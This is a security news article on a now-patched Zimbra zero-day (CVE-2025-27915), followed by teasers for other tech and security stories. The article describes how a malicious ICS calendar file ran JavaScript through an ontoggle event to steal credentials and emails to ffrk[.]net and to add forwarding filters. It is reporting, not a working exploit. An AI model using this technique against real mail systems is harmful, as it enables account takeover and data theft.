Zimbra Zero-Day Exploited to Target Brazilian Military via Malicious ICS Files

06/10/2025

Oct 06, 2025Ravie LakshmananEmail Security / Zero-Day

A now patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military.
Tracked as CVE-2025-27915 (CVSS score: 5.4), the vulnerability is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client that arises as a result of insufficient sanitization of HTML content in ICS calendar files, resulting in arbitrary code execution.
“When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a <details> tag,” according to a description of the flaw in the NIST National Vulnerability Database (NVD).

“This allows an attacker to run arbitrary JavaScript within the victim’s session, potentially leading to unauthorized actions such as setting e-mail filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim’s account, including e-mail redirection and data exfiltration.”
The vulnerability was addressed by Zimbra as part of versions 9.0.0 Patch 44, 10.0.13, and 10.1.5 released on January 27, 2025. The advisory, however, makes no mention of it having been exploited in real-world attacks.
However, according to a report published by StrikeReady Labs on September 30, 2025, the observed in-the-wild activity involved unknown threat actors spoofing the Libyan Navy’s Office of Protocol to target the Brazilian military using malicious ICS files that exploited the flaw.
The ICS file contained a JavaScript code that’s designed to act as a comprehensive data stealer to siphon credentials, emails, contacts, and shared folders to an external server (“ffrk[.]net”). It also searches for emails in a specific folder, and adds malicious Zimbra email filter rules with the name “Correo” to forward the messages to spam_to_junk@proton.me.

As a way to avoid detection, the script is fashioned such that it hides certain user interface elements and detonates only if more than three days have passed since the last time it was executed.
It’s currently not clear who is behind the attack, but earlier this year, ESET revealed that the Russian threat actor known as APT28 had exploited XSS vulnerabilities in various webmail solutions from Roundcube, Horde, MDaemon, and Zimbra to obtain unauthorized access.
A similar modus operandi has also been adopted by other hacking groups like Winter Vivern and UNC1151 (aka Ghostwriter) to facilitate credential theft.

Source: thehackernews.com

Beer Giant Asahi Says Data Stolen in Ransomware Attack

Japanese brewing giant Asahi Group Holdings has confirmed that a ransomware attack has caused the week-long outage at its domestic subsidiaries. The company disclosed the incident last week, blaming order and shipment operational disruptions, and call center downtime on a cyberattack that resulted in system failures. The company, which suspended production at some of its factories in Japan, … [Read More...]

PoC Exploit Released for Sudo Vulnerability that Enables Attackers to Gain Root Access

A publicly available proof-of-concept (PoC) exploit has been released for CVE-2025-32463, a local privilege escalation (LPE) flaw in the Sudo utility that can grant root access under specific configurations. Security researcher Rich Mirch is credited with identifying the weakness, while a functional PoC and usage guide have been published in an open GitHub repository, accelerating the … [Read More...]

Oracle E-Business Suite Zero-Day Exploited in Cl0p Attacks

The recent data theft and extortion campaign targeting Oracle E-Business Suite customers has been confirmed to be the work of the notorious Cl0p ransomware group, and Oracle has admitted that the hackers have exploited a zero-day vulnerability. The attacks targeting Oracle E-Business Suite (EBS) customers came to light last week, when Google Threat Intelligence Group (GTIG) and Mandiant warned … [Read More...]

Redis Server Vulnerability use-after-free Vulnerability Enables Remote Code Execution

A critical use-after-free vulnerability, identified as CVE-2025-49844, has been discovered in Redis servers, enabling authenticated attackers to achieve remote code execution. This high-severity flaw affects all versions of Redis that utilize the Lua scripting engine, presenting a significant threat to a wide range of deployments that rely on the popular in-memory data store. The core of … [Read More...]

OpenAI and Jony Ive’s Secretive AI Device Reportedly Hit by Software and Infra Troubles

OpenAI and former Apple design chief Jony Ive have reportedly been developing a secretive AI device for much of the year. While earlier reports suggested a launch by the end of 2026, the project may now face delays amid mounting technical challenges. As per a report, the teams are grappling with software and infrastructure issues, particularly around building a sustainable compute budget to power … [Read More...]

Hackers Weaponize AWS X-Ray Service to Work as Covert Command & Control Server

A sophisticated technique uncovered where threat actors abuse Amazon Web Services‘ X-Ray distributed tracing service to establish covert command and control (C2) communications, demonstrating how legitimate cloud infrastructure can be weaponized for malicious purposes. AWS X-Ray, designed to help developers analyze application performance through distributed tracing, has been repurposed by red … [Read More...]

Realme GT 8 Pro, iQOO 15, OnePlus 15 Camera Details Leaked Ahead of Launch in China

Qualcomm launched its top-tier Snapdragon 8 Elite Gen 5 SoC last month, and several smartphone brands are preparing to unveil flagship devices powered by the same chipset. The Xiaomi 17 series became the first to arrive with the new Snapdragon 8 Elite Gen 5 chip, while upcoming launches include the Realme GT 8 Pro, iQOO 15, and OnePlus 15. Ahead of their formal reveal, a prominent Chinese tipster … [Read More...]

QNAP NetBak Replicator Vulnerability Let Attackers Execute Unauthorized Code

QNAP has released a security advisory detailing a vulnerability in its NetBak Replicator utility that could allow local attackers to execute unauthorized code. The flaw, identified as CVE-2025-57714, has been rated as “Important” and affects specific versions of the backup and restore software. The company has already issued a patch and is urging users to update their systems to prevent … [Read More...]

How Windows Command-line Utility PsExec Can Be Abused To Execute Malicious Code

PsExec represents one of the most contradictory tools in the cybersecurity landscape, a legitimate system administration utility that has become a cornerstone of malicious lateral movement campaigns. Recent threat intelligence reports indicate that PsExec remains among the top five tools used in cyberattacks as of 2025, with ransomware groups like Medusa, LockBit, and Kasseika actively … [Read More...]

You'd think this was a real Stream Deck, but this genius DIYer 3D printed it and made it smart-home ready

Elgato's Stream Deck isn't meant for everyone, but it's one of the most widely adopted devices in recent years, especially among streamers, content creators, and productivity enthusiasts. Stream Deck's growing popularity also led to other players entering the space to compete with Corsair and giving users more choices. However, these aren't the only options, as it's pretty simple to build your own … [Read More...]